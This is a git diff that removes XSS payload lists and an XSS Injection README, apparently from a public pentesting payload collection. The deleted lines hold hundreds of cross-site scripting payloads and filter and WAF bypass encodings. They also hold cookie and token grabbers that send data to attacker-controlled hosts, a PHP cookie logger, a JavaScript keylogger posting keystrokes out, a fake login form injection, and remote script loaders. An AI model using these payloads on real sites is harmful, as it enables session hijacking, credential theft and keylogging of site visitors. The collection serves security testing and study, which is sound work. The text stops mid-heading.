src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> -<svg><script ?>alert(1) -<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> -<img src=`xx:xx`onerror=alert(1)> -<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> -<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> -<math><a xlink:href="//jsfiddle.net/t846h/">click -<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> -<svg contentScriptType=text/vbs><script>MsgBox+1 -<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a -<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> -<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ -<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F -<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script -<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> -<script>+-+-1-+-+alert(1)</script> -<body/onload=&lt;!--&gt;&#10alert(1)> -<script itworksinallbrowsers>/*<script* */alert(1)</script -<img src ?itworksonchrome?\/onerror = alert(1) -<svg><script>//&NewLine;confirm(1);</script </svg> -<svg><script onlypossibleinopera:-)> alert(1) -<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe -<script x> alert(1) </script 1=2 -<div/onmouseover='alert(1)'> style="x:"> -<--`<img/src=` onerror=alert(1)> --!> -<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> -<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> -"><img src=x onerror=window.open('https://www.google.com/');> -<form><button formaction=javascript&colon;alert(1)>CLICKME -<math><a xlink:href="//jsfiddle.net/t846h/">click -<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> -<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> -<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> \ No newline at end of file diff --git a/XSS Injection/Intruders/xss_payloads_quick.txt b/XSS Injection/Intruders/xss_payloads_quick.txt deleted file mode 100644 index 3433ea7..0000000 --- a/XSS Injection/Intruders/xss_payloads_quick.txt +++ /dev/null @@ -1,39 +0,0 @@ -javascript:alert(1)//INJECTX -<svg/onload=alert(1)>//INJECTX -<img onload=alert(1)>//INJECTX -<img src=x onerror=prompt(1)>//INJECTX -<a href="javascript:alert(1)" onmouseover=alert(1)>INJECTX HOVER</a> - onmouseover="document.cookie=true;">//INJECTX -alert(1)>//INJECTX -<h1>INJECTX</h1> -<img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)> -<svg><script>/<@/>alert(1)</script>//INJECTX -<svg/onload=alert(/INJECTX/)> -<iframe/onload=alert(/INJECTX/)> -<svg/onload=alert`INJECTX`> -<svg/onload=alert(/INJECTX/)> -<svg/onload=alert(`INJECTX`)> -}alert(/INJECTX/);{// -<h1/onclick=alert(1)>a//INJECTX -<svg/onload=alert(/INJECTX/)> -<p/onclick=alert(/INJECTX/)>a -<svg/onload=alert`INJECTX`> -<svg/onload=alert(/INJECTX/)> -<svg/onload=alert(`INJECTX`)> -<video><source onerror="javascript:alert(1)">//INJECTX -<video onerror="javascript:alert(1)"><source>//INJECTX -<audio onerror="javascript:alert(1)"><source>//INJECTX -<input autofocus onfocus=alert(1)>//INJECTX -<select autofocus onfocus=alert(1)>//INJECTX -<textarea autofocus onfocus=alert(1)>//INJECTX -<keygen autofocus onfocus=alert(1)>//INJECTX -<button form=test onformchange=alert(1)>//INJECTX -<form><button formaction="javascript:alert(1)">//INJECTX -<svg onload=(alert)(1) >//INJECTX -<script>$=1,alert($)</script>//INJECTX -<!--<img src="--><img src=x onerror=alert(1)//">//INJECTX -<img/src='x'onerror=alert(1)>//INJECTX -<marguee/onstart=alert(1)>//INJECTX -<script>alert(1)//INJECTX -<script>alert(1)<!--INJECTX -<marquee loop=1 width=0 onfinish=alert(1)>//INJECTX \ No newline at end of file diff --git a/XSS Injection/Intruders/xss_swf_fuzz.txt b/XSS Injection/Intruders/xss_swf_fuzz.txt deleted file mode 100644 index 83b1c68..0000000 --- a/XSS Injection/Intruders/xss_swf_fuzz.txt +++ /dev/null @@ -1,24 +0,0 @@ -#getURL,javascript:alert(1)", -#goto,javascript:alert(1)", -?javascript:alert(1)", -?alert(1)", -?getURL(javascript:alert(1))", -?asfunction:getURL,javascript:alert(1)//", -?getURL,javascript:alert(1)", -?goto,javascript:alert(1)", -?clickTAG=javascript:alert(1)", -?url=javascript:alert(1)", -?clickTAG=javascript:alert(1)&TargetAS=", -?TargetAS=javascript:alert(1)", -?skinName=asfunction:getURL,javascript:alert(1)//", -?baseurl=asfunction:getURL,javascript:alert(1)//", -?base=javascript:alert(0)", -?onend=javascript:alert(1)//", -?userDefined=');function someFunction(a){}alert(1)//", -?URI=javascript:alert(1)", -?callback=javascript:alert(1)", -?getURLValue=javascript:alert(1)", -?goto=javascript:alert(1)", -?pg=javascript:alert(1)", -?page=javascript:alert(1)" -?playerready=alert(document.cookie) diff --git a/XSS Injection/README.md b/XSS Injection/README.md deleted file mode 100644 index 59087ac..0000000 --- a/XSS Injection/README.md +++ /dev/null @@ -1,1319 +0,0 @@ -# Cross Site Scripting - -> Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. - -## Summary - -- [Cross Site Scripting](#cross-site-scripting) - - [Vulnerability Details](#vulnerability-details) - - [Exploit code or POC](#exploit-code-or-poc) - - [Data grabber for XSS](#data-grabber-for-xss) - - [CORS](#cors) - - [UI redressing](#ui-redressing) - - [Javascript keylogger](#javascript-keylogger) - - [Other ways](#other-ways) - - [Identify an XSS endpoint](#identify-an-xss-endpoint) - - [Tools](#tools) - - [XSS in HTML/Applications](#xss-in-htmlapplications) - - [Common Payloads](#common-payloads) - - [XSS using HTML5 tags](#xss-using-html5-tags) - - [XSS using a remote JS](#xss-using-a-remote-js) - - [XSS in hidden input](#xss-in-hidden-input) - - [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized) - - [DOM based XSS](#dom-based-xss) - - [XSS in JS Context](#xss-in-js-context) - - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - - [XSS in files](#xss-in-files) - - [XSS in XML](#xss-in-xml) - - [XSS in SVG](#xss-in-svg) - - [XSS in SVG (short)](#xss-in-svg-short) - - [XSS in Markdown](#xss-in-markdown) - - [XSS in SWF flash application](#xss-in-swf-flash-application) - - [XSS in SWF flash application](#xss-in-swf-flash-application-1) - - [XSS in CSS](#xss-in-css) - - [XSS in PostMessage](#xss-in-postmessage) - - [Blind XSS](#blind-xss) - - [XSS Hunter](#xss-hunter) - - [Other Blind XSS tools](#other-blind-xss-tools) - - [Blind XSS endpoint](#blind-xss-endpoint) - - [Tips](#tips) - - [Mutated XSS](#mutated-xss) - - [Polyglot XSS](#polyglot-xss) - - [Filter Bypass and exotic payloads](#filter-bypass-and-exotic-payloads) - - [Bypass case sensitive](#bypass-case-sensitive) - - [Bypass tag blacklist](#bypass-tag-blacklist) - - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) - - [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) - - [Bypass quotes for string](#bypass-quotes-for-string) - - [Bypass quotes in script tag](#bypass-quotes-in-script-tag) - - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) - - [Bypass dot filter](#bypass-dot-filter) - - [Bypass parenthesis for string](#bypass-parenthesis-for-string) - - [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon) - - [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist) - - [Bypass space filter](#bypass-space-filter) - - [Bypass email filter](#bypass-email-filter) - - [Bypass document blacklist](#bypass-document-blacklist) - - [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) - - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) - - [Bypass ">" using nothing](#bypass--using-nothing) - - [Bypass "<" and ">" using < and >](#bypass--and--using--and-) - - [Bypass ";" using another character](#bypass--using-another-character) - - [Bypass using HTML encoding](#bypass-using-html-encoding) - - [Bypass using Katana](#bypass-using-katana) - - [Bypass using Cuneiform](#bypass-using-cuneiform) - - [Bypass using Lontara](#bypass-using-lontara) - - [Bypass using ECMAScript6](#bypass-using-ecmascript6) - - [Bypass using Octal encoding](#bypass-using-octal-encoding) - - [Bypass using Unicode](#bypass-using-unicode) - - [Bypass using UTF-7](#bypass-using-utf-7) - - [Bypass using UTF-8](#bypass-using-utf-8) - - [Bypass using UTF-16be](#bypass-using-utf-16be) - - [Bypass using UTF-32](#bypass-using-utf-32) - - [Bypass using BOM](#bypass-using-bom) - - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) - - [Bypass using jsfuck](#bypass-using-jsfuck) - - [CSP Bypass](#csp-bypass) - - [Bypass CSP using JSONP from Google (Trick by @apfeifer27)](#bypass-csp-using-jsonp-from-google-trick-by-apfeifer27) - - [Bypass CSP by lab.wallarm.com](#bypass-csp-by-labwallarmcom) - - [Bypass CSP by Rhynorater](#bypass-csp-by-rhynorater) - - [Bypass CSP by @akita_zen](#bypass-csp-by-akita_zen) - - [Bypass CSP by @404death](#bypass-csp-by-404death) - - [Common WAF Bypass](#common-waf-bypass) - - [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi) - - [25st January 2021](#25st-january-2021) - - [21st April 2020](#21st-april-2020) - - [22nd August 2019](#22nd-august-2019) - - [5th June 2019](#5th-june-2019) - - [3rd June 2019](#3rd-june-2019) - - [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10) - - [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018) - - [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018) - - [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018) - - [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018) - - [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019) - - [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018) - - [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018) - - [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018) - - [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019) - - [References](#references) - -## Vulnerability Details - -Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions. - -There are 3 main types of XSS attacks: - -* **Reflected XSS**: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials. - -* **Stored XSS**: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions. - -* **DOM-based XSS**: is a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when a user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code. - -To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code. - - -## Exploit code or POC - -### Data grabber for XSS - -Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page. - -```html -<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script> -<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script> -<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script> -<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script> -``` - -Write the collected data into a file. - -```php -<?php -$cookie = $_GET['c']; -$fp = fopen('cookies.txt', 'a+'); -fwrite($fp, 'Cookie:' .$cookie."\r\n"); -fclose($fp); -?> -``` - -### CORS - -```html -<script> - fetch('https://<SESSION>.burpcollaborator.net', { - method: 'POST', - mode: 'no-cors', - body: document.cookie - }); -</script> -``` - -### UI redressing - -Leverage the XSS to modify the HTML content of the page in order to display a fake login form. - -```html -<script> -history.replaceState(null, null, '../../../login'); -document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>" -</script> -``` - -### Javascript keylogger - -Another way to collect sensitive data is to set a javascript keylogger. - -```javascript -<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'> -``` - -### Other ways - -More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all): - -- [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/) -- [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/) -- [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html) -- [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html) -- [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html) -- [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html) - -## Identify an XSS endpoint - -This payload opens the debugger in the developer console rather than triggering a popup alert box. - -```javascript -<script>debugger;</script> -``` - -Modern applications with content hosting can use [sandbox domains][sandbox-domains] - -> to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data. - -[sandbox-domains]:https://security.googleblog.com/2012/08/content-hosting-for-modern-web.html - -For this reason, it's better to use `alert(document.domain)` or `alert(window.origin)` rather than `alert(1)` as default XSS payload in order to know in which scope the XSS is actually executing. - -Better payload replacing `<script>alert(1)</script>`: - -```html -<script>alert(document.domain.concat("\n").concat(window.origin))</script> -``` - -While `alert()` is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so `console.log()` can be used instead to display a message in the console of the developer console (doesn't require any interaction). - -Example: - -```html -<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script> -``` - -References: - -- [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain) -- [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c) -- [LiveOverflow blog post - DO NOT USE alert(1) for XSS](https://liveoverflow.com/do-not-use-alert-1-in-xss/) - -### Tools - -Most tools are also suitable for blind XSS attacks: - -* [XSSStrike](https://github.com/s0md3v/XSStrike): Very popular but unfortunately not very well maintained -* [xsser](https://github.com/epsylon/xsser): Utilizes a headless browser to detect XSS vulnerabilities -* [Dalfox](https://github.com/hahwul/dalfox): Extensive functionality and extremely fast thanks to the implementation in Go -* [XSpear](https://github.com/hahwul/XSpear): Similar to Dalfox but based on Ruby -* [domdig](https://github.com/fcavallarin/domdig): Headless Chrome XSS Tester - -## XSS in HTML/Applications - -### Common Payloads - -```javascript -// Basic payload -<script>alert('XSS')</script> -<scr<script>ipt>alert('XSS')</scr<script>ipt> -"><script>alert('XSS')</script> -"><script>alert(String.fromCharCode(88,83,83))</script> -<script>\u0061lert('22')</script> -<script>eval('\x61lert(\'33\')')</script> -<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" -<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;"> - -// Img payload -<img src=x onerror=alert('XSS');> -<img src=x onerror=alert('XSS')// -<img src=x onerror=alert(String.fromCharCode(88,83,83));> -<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> -<img src=x:alert(alt) onerror=eval(src) alt=xss> -"><img src=x onerror=alert('XSS');> -"><img src=x onerror=alert(String.fromCharCode(88,83,83));> - -// Svg payload -<svg onload=alert(1)> -<svg/onload=alert('XSS')> -<svg onload=alert(1)// -<svg/onload=alert(String.fromCharCode(88,83,83))> -<svg id=alert(1) onload=eval(id)> -"><svg/onload=alert(String.fromCharCode(88,83,83))> -"><svg/onload=alert(/XSS/) -<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script) -<svg><script>alert('33') -<svg><script>alert&lpar;'33'&rpar; - -// Div payload -<div onpointerover="alert(45)">MOVE HERE</div> -<div onpointerdown="alert(45)">MOVE HERE</div> -<div onpointerenter="alert(45)">MOVE HERE</div> -<div onpointerleave="alert(45)">MOVE HERE</div> -<div onpointermove="alert(45)">MOVE HERE</div> -<div onpointerout="alert(45)">MOVE HERE</div> -<div onpointerup="alert(45)">MOVE HERE</div> -``` - -### XSS using HTML5 tags - -```javascript -<body onload=alert(/XSS/.source)> -<input autofocus onfocus=alert(1)> -<select autofocus onfocus=alert(1)> -<textarea autofocus onfocus=alert(1)> -<keygen autofocus onfocus=alert(1)> -<video/poster/onerror=alert(1)> -<video><source onerror="javascript:alert(1)"> -<video src=_ onloadstart="alert(1)"> -<details/open/ontoggle="alert`1`"> -<audio src onloadstart=alert(1)> -<marquee onstart=alert(1)> -<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter> - -<body ontouchstart=alert(1)> // Triggers when a finger touch the screen -<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen -<body ontouchmove=alert(1)> // When a finger is dragged across the screen. -``` - -### XSS using a remote JS - -```html -<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'> -<script src=14.rs> -// you can also specify an arbitrary payload with 14.rs/#payload -e.g: 14.rs/#alert(document.domain) -``` - -### XSS in hidden input - -```javascript -<input type="hidden" accesskey="X" onclick="alert(1)"> -Use CTRL+SHIFT+X to trigger the onclick event -``` - -### XSS when payload is reflected capitalized - -```javascript -<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)> -``` - -### DOM based XSS - -Based on a DOM XSS sink. - -```javascript -#"><img src=/ onerror=alert(2)> -``` - -### XSS in JS Context - -```javascript --(confirm)(document.domain)// -; alert(1);// -// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) -``` - -## XSS in wrappers javascript and data URI - -XSS with javascript: - -```javascript -javascript:prompt(1) - -%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 - -&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41 - -We can encode the "javascript:" in Hex/Octal -\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) -\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) -\152\141\166\141\163\143\162\151\160\164\072alert(1) - -We can use a 'newline character' -java%0ascript:alert(1) - LF (\n) -java%09script:alert(1) - Horizontal tab (\t) -java%0dscript:alert(1) - CR (\r) - -Using the escape character -\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) - -Using the newline and a comment // -javascript://%0Aalert(1) -javascript://anything%0D%0A%0D%0Awindow.alert(1) -``` - -XSS with data: - -```javascript -data:text/html,<script>alert(0)</script> -data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ -<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> -``` - -XSS with vbscript: only IE - -```javascript -vbscript:msgbox("XSS") -``` - -## XSS in files - -** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup. - -```xml -<name> - <value><![CDATA[<script>confirm(document.domain)</script>]]></value> -</name> -``` - -### XSS in XML - -```xml -<html> -<head></head> -<body> -<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> -</body> -</html> -``` - -### XSS in SVG - -```xml -<?xml version="1.0" standalone="no"?> -<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> - -<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> - <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> - <script type="text/javascript"> - alert(document.domain); - </script> -</svg> -``` - -### XSS in SVG (short) - -```javascript -<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> - -<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> -<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg> -<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg> -``` - -### XSS in Markdown - -```csharp -[a](javascript:prompt(document.cookie)) -[a](j a v a s c r i p t:prompt(document.cookie)) -[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) -[a](javascript:window.onerror=alert;throw%201) -``` - -### XSS in SWF flash application - -```powershell -Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); -IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} -IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); -``` - -more payloads in ./files - -### XSS in SWF flash application - -``` -flashmediaelement.swf?jsinitfunctio%gn=alert`1` -flashmediaelement.swf?jsinitfunctio%25gn=alert(1) -ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 -swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// -swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf -plupload.flash.swf?%#target%g=alert&uid%g=XSS& -moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true -video-js.swf?readyFunction=alert(1) -player.swf?playerready=alert(document.cookie) -player.swf?tracecall=alert(document.cookie) -banner.swf?clickTAG=javascript:alert(1);// -io.swf?yid=\"));}catch(e){alert(1);}// -video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 -bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 -flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// -phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// -``` - -### XSS in CSS - -```html -<!DOCTYPE html> -<html> -<head> -<style> -div { - background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>"); - background-color: #cccccc; -} -</style> -</head> - <body> - <div>lol</div> - </body> -</html> -``` - -## XSS in PostMessage - -> If the target origin is asterisk * the message can be sent to any domain has reference to the child page. - -```html -<html> -<body> - <input type=button value="Click Me" id="btn"> -</body> - -<script> -document.getElementById('btn').onclick = function(e){ - window.poc = window.open('http://www.redacted.com/#login'); - setTimeout(function(){ - window.poc.postMessage( - { - "sender": "accounts", - "url": "javascript:confirm('XSS')", - }, - '*' - ); - }, 2000); -} -</script> -</html> -``` - -## Blind XSS - -### XSS Hunter - -> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. - -XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). - -You can set up an alternative version -* Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express) -* Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/) - -```xml -"><script src="https://js.rip/<custom.name>"></script> -"><script src=//<custom.subdomain>.xss.ht></script> -<script>$.getScript("//<custom.subdomain>.xss.ht")</script> -``` - -### Other Blind XSS tools - -- [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy) -- [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS) -- [ezXSS - ssl](https://github.com/ssl/ezXSS) - -### Blind XSS endpoint - -- Contact forms -- Ticket support -- Referer Header - - Custom Site Analytics - - Administrative Panel logs -- User Agent - - Custom Site Analytics - - Administrative Panel logs -- Comment Box - - Administrative Panel - -### Tips - -You can use a [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool. - -Eg. payload - -```html -<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script> -``` - -Eg. one-line HTTP server: - -``` -$ ruby -run -ehttpd . -p8080 -``` - -## Mutated XSS - -Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`. - -Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/. - -```javascript -<noscript><p title="</noscript><img src=x onerror=alert(1)>"> -``` - -## Polyglot XSS - -Polyglot XSS - 0xsobky - -```javascript -jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e -``` - -Polyglot XSS - Ashar Javed - -```javascript -">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> -``` - -Polyglot XSS - Mathias 